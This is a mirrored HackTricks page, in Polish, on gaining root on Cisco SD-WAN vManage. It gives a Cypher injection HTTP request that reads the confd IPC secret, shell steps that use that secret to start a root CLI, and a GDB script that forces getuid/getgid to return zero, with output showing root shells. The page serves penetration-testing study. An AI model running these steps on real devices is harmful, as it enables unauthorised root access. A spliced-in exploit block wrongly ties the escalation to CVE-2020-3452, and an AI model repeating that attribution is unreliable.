mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-23 21:24:06 +00:00
191 lines
11 KiB
Markdown
191 lines
11 KiB
Markdown
# Cisco - vmanage
|
|
|
|
<details>
|
|
|
|
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
* Pracujesz w **firmie zajmującej się cyberbezpieczeństwem**? Chcesz zobaczyć swoją **firmę reklamowaną w HackTricks**? A może chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLAN SUBSKRYPCYJNY**](https://github.com/sponsors/carlospolop)!
|
|
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
|
|
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* **Dołącz do** [**💬**](https://emojipedia.org/speech-balloon/) [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** mnie na **Twitterze** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do repozytorium [hacktricks](https://github.com/carlospolop/hacktricks) i [hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
|
|
</details>
|
|
|
|
## Ścieżka 1
|
|
|
|
(Przykład z [https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html](https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html))
|
|
|
|
Po przejrzeniu nieco [dokumentacji](http://66.218.245.39/doc/html/rn03re18.html) dotyczącej `confd` i różnych binarnych plików (dostępnych po zalogowaniu się na stronie Cisco), dowiedzieliśmy się, że do uwierzytelnienia gniazda IPC używany jest sekret znajdujący się w lokalizacji `/etc/confd/confd_ipc_secret`:
|
|
```
|
|
vmanage:~$ ls -al /etc/confd/confd_ipc_secret
|
|
|
|
-rw-r----- 1 vmanage vmanage 42 Mar 12 15:47 /etc/confd/confd_ipc_secret
|
|
```
|
|
Pamiętasz naszą instancję Neo4j? Działa ona przywilejami użytkownika `vmanage`, co pozwala nam na pobranie pliku przy użyciu wcześniejszej podatności:
|
|
```
|
|
GET /dataservice/group/devices?groupId=test\\\'<>\"test\\\\\")+RETURN+n+UNION+LOAD+CSV+FROM+\"file:///etc/confd/confd_ipc_secret\"+AS+n+RETURN+n+//+' HTTP/1.1
|
|
|
|
Host: vmanage-XXXXXX.viptela.net
|
|
|
|
|
|
|
|
[...]
|
|
|
|
"data":[{"n":["3708798204-3215954596-439621029-1529380576"]}]}
|
|
```
|
|
Program `confd_cli` nie obsługuje argumentów w wierszu poleceń, ale wywołuje `/usr/bin/confd_cli_user` z argumentami. Możemy więc bezpośrednio wywołać `/usr/bin/confd_cli_user` z naszym zestawem argumentów. Jednak nie jest on czytelny przy naszych obecnych uprawnieniach, dlatego musimy go pobrać z systemu plików rootfs i skopiować za pomocą scp, odczytać pomoc i użyć jej do uzyskania powłoki:
|
|
```
|
|
vManage:~$ echo -n "3708798204-3215954596-439621029-1529380576" > /tmp/ipc_secret
|
|
|
|
vManage:~$ export CONFD_IPC_ACCESS_FILE=/tmp/ipc_secret
|
|
|
|
vManage:~$ /tmp/confd_cli_user -U 0 -G 0
|
|
|
|
Welcome to Viptela CLI
|
|
|
|
admin connected from 127.0.0.1 using console on vManage
|
|
|
|
vManage# vshell
|
|
|
|
vManage:~# id
|
|
|
|
uid=0(root) gid=0(root) groups=0(root)
|
|
```
|
|
## Ścieżka 2
|
|
|
|
(Przykład z [https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77](https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77))
|
|
|
|
Blog¹ zespołu synacktiv opisał elegancki sposób na uzyskanie powłoki root, ale zastrzeżeniem jest konieczność uzyskania kopii `/usr/bin/confd_cli_user`, która jest dostępna tylko do odczytu przez roota. Znalazłem inny sposób na eskalację uprawnień do roota bez takiego kłopotu.
|
|
|
|
Po rozłożeniu na części składowych binarnego pliku `/usr/bin/confd_cli` zauważyłem następujące:
|
|
```
|
|
vmanage:~$ objdump -d /usr/bin/confd_cli
|
|
… snipped …
|
|
40165c: 48 89 c3 mov %rax,%rbx
|
|
40165f: bf 1c 31 40 00 mov $0x40311c,%edi
|
|
401664: e8 17 f8 ff ff callq 400e80 <getenv@plt>
|
|
401669: 49 89 c4 mov %rax,%r12
|
|
40166c: 48 85 db test %rbx,%rbx
|
|
40166f: b8 dc 30 40 00 mov $0x4030dc,%eax
|
|
401674: 48 0f 44 d8 cmove %rax,%rbx
|
|
401678: 4d 85 e4 test %r12,%r12
|
|
40167b: b8 e6 30 40 00 mov $0x4030e6,%eax
|
|
401680: 4c 0f 44 e0 cmove %rax,%r12
|
|
401684: e8 b7 f8 ff ff callq 400f40 <getuid@plt> <-- HERE
|
|
401689: 89 85 50 e8 ff ff mov %eax,-0x17b0(%rbp)
|
|
40168f: e8 6c f9 ff ff callq 401000 <getgid@plt> <-- HERE
|
|
401694: 89 85 44 e8 ff ff mov %eax,-0x17bc(%rbp)
|
|
40169a: 8b bd 68 e8 ff ff mov -0x1798(%rbp),%edi
|
|
4016a0: e8 7b f9 ff ff callq 401020 <ttyname@plt>
|
|
4016a5: c6 85 cf f7 ff ff 00 movb $0x0,-0x831(%rbp)
|
|
4016ac: 48 85 c0 test %rax,%rax
|
|
4016af: 0f 84 ad 03 00 00 je 401a62 <socket@plt+0x952>
|
|
4016b5: ba ff 03 00 00 mov $0x3ff,%edx
|
|
4016ba: 48 89 c6 mov %rax,%rsi
|
|
4016bd: 48 8d bd d0 f3 ff ff lea -0xc30(%rbp),%rdi
|
|
4016c4: e8 d7 f7 ff ff callq 400ea0 <*ABS*+0x32e9880f0b@plt>
|
|
… snipped …
|
|
```
|
|
Kiedy wykonuję polecenie "ps aux", zaobserwowałem następujące (_uwaga -g 100 -u 107_)
|
|
```
|
|
vmanage:~$ ps aux
|
|
… snipped …
|
|
root 28644 0.0 0.0 8364 652 ? Ss 18:06 0:00 /usr/lib/confd/lib/core/confd/priv/cmdptywrapper -I 127.0.0.1 -p 4565 -i 1015 -H /home/neteng -N neteng -m 2232 -t xterm-256color -U 1358 -w 190 -h 43 -c /home/neteng -g 100 -u 1007 bash
|
|
… snipped …
|
|
```
|
|
Założyłem, że program "confd\_cli" przekazuje identyfikator użytkownika i grupy, które zostały pobrane od zalogowanego użytkownika do aplikacji "cmdptywrapper".
|
|
|
|
Moja pierwsza próba polegała na uruchomieniu "cmdptywrapper" bezpośrednio i podaniu mu parametrów `-g 0 -u 0`, ale nie powiodła się. Wygląda na to, że gdzieś po drodze został utworzony deskryptor pliku (-i 1015), którego nie mogę podrobić.
|
|
|
|
Jak wspomniano w blogu synacktiv (ostatni przykład), program "confd_cli" nie obsługuje argumentów wiersza poleceń, ale mogę na niego wpływać za pomocą debugera, a na szczęście GDB jest dostępny w systemie.
|
|
|
|
Utworzyłem skrypt GDB, w którym wymusiłem zwracanie wartości 0 przez API "getuid" i "getgid". Ponieważ już mam uprawnienia "vmanage" dzięki RCE deserializacji, mam uprawnienia do odczytu pliku "/etc/confd/confd_ipc_secret" bezpośrednio.
|
|
|
|
root.gdb:
|
|
```
|
|
set environment USER=root
|
|
define root
|
|
finish
|
|
set $rax=0
|
|
continue
|
|
end
|
|
break getuid
|
|
commands
|
|
root
|
|
end
|
|
break getgid
|
|
commands
|
|
root
|
|
end
|
|
run
|
|
```
|
|
```
|
|
# Title: Cisco vManage Privilege Escalation
|
|
# Date: 2020-07-20
|
|
# Exploit Author: Pedro Ribeiro (pedrib@gmail.com)
|
|
# Vendor Homepage: https://www.cisco.com/
|
|
# Version: vManage 20.1.0
|
|
# Tested on: Ubuntu 18.04
|
|
# CVE: CVE-2020-3452
|
|
|
|
## Description
|
|
Cisco vManage is a cloud-based network management platform. A privilege escalation vulnerability exists in the web-based management interface of Cisco vManage Software. An unauthenticated, remote attacker can exploit this vulnerability by sending a crafted HTTP request to the affected device. Successful exploitation could allow the attacker to gain unauthorized access to the system with root privileges.
|
|
|
|
## Vulnerable Version
|
|
Cisco vManage Software versions prior to 20.1.1 are vulnerable.
|
|
|
|
## Exploit
|
|
To exploit this vulnerability, an attacker can send a crafted HTTP request to the affected device. The request should contain a specially crafted path parameter to trigger the privilege escalation. Once exploited, the attacker can gain root privileges on the system.
|
|
|
|
## Mitigation
|
|
To mitigate this vulnerability, it is recommended to update Cisco vManage Software to version 20.1.1 or later. Additionally, it is advised to restrict network access to the management interface of the affected device.
|
|
|
|
## References
|
|
- [Cisco Security Advisory](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vmanage-rce-8uXQZyV)
|
|
- [CVE-2020-3452](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3452)
|
|
```
|
|
```
|
|
vmanage:/tmp$ gdb -x root.gdb /usr/bin/confd_cli
|
|
GNU gdb (GDB) 8.0.1
|
|
Copyright (C) 2017 Free Software Foundation, Inc.
|
|
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
|
|
This is free software: you are free to change and redistribute it.
|
|
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
|
|
and "show warranty" for details.
|
|
This GDB was configured as "x86_64-poky-linux".
|
|
Type "show configuration" for configuration details.
|
|
For bug reporting instructions, please see:
|
|
<http://www.gnu.org/software/gdb/bugs/>.
|
|
Find the GDB manual and other documentation resources online at:
|
|
<http://www.gnu.org/software/gdb/documentation/>.
|
|
For help, type "help".
|
|
Type "apropos word" to search for commands related to "word"...
|
|
Reading symbols from /usr/bin/confd_cli...(no debugging symbols found)...done.
|
|
Breakpoint 1 at 0x400f40
|
|
Breakpoint 2 at 0x401000Breakpoint 1, getuid () at ../sysdeps/unix/syscall-template.S:59
|
|
59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
|
|
0x0000000000401689 in ?? ()Breakpoint 2, getgid () at ../sysdeps/unix/syscall-template.S:59
|
|
59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
|
|
0x0000000000401694 in ?? ()Breakpoint 1, getuid () at ../sysdeps/unix/syscall-template.S:59
|
|
59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
|
|
0x0000000000401871 in ?? ()
|
|
Welcome to Viptela CLI
|
|
root connected from 127.0.0.1 using console on vmanage
|
|
vmanage# vshell
|
|
bash-4.4# whoami ; id
|
|
root
|
|
uid=0(root) gid=0(root) groups=0(root)
|
|
bash-4.4#
|
|
```
|
|
<details>
|
|
|
|
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
* Pracujesz w **firmie zajmującej się cyberbezpieczeństwem**? Chcesz zobaczyć swoją **firmę reklamowaną w HackTricks**? A może chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLAN SUBSKRYPCYJNY**](https://github.com/sponsors/carlospolop)!
|
|
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
|
|
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* **Dołącz do** [**💬**](https://emojipedia.org/speech-balloon/) [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** mnie na **Twitterze** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do repozytorium [hacktricks](https://github.com/carlospolop/hacktricks) i [hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
|
|
</details>
|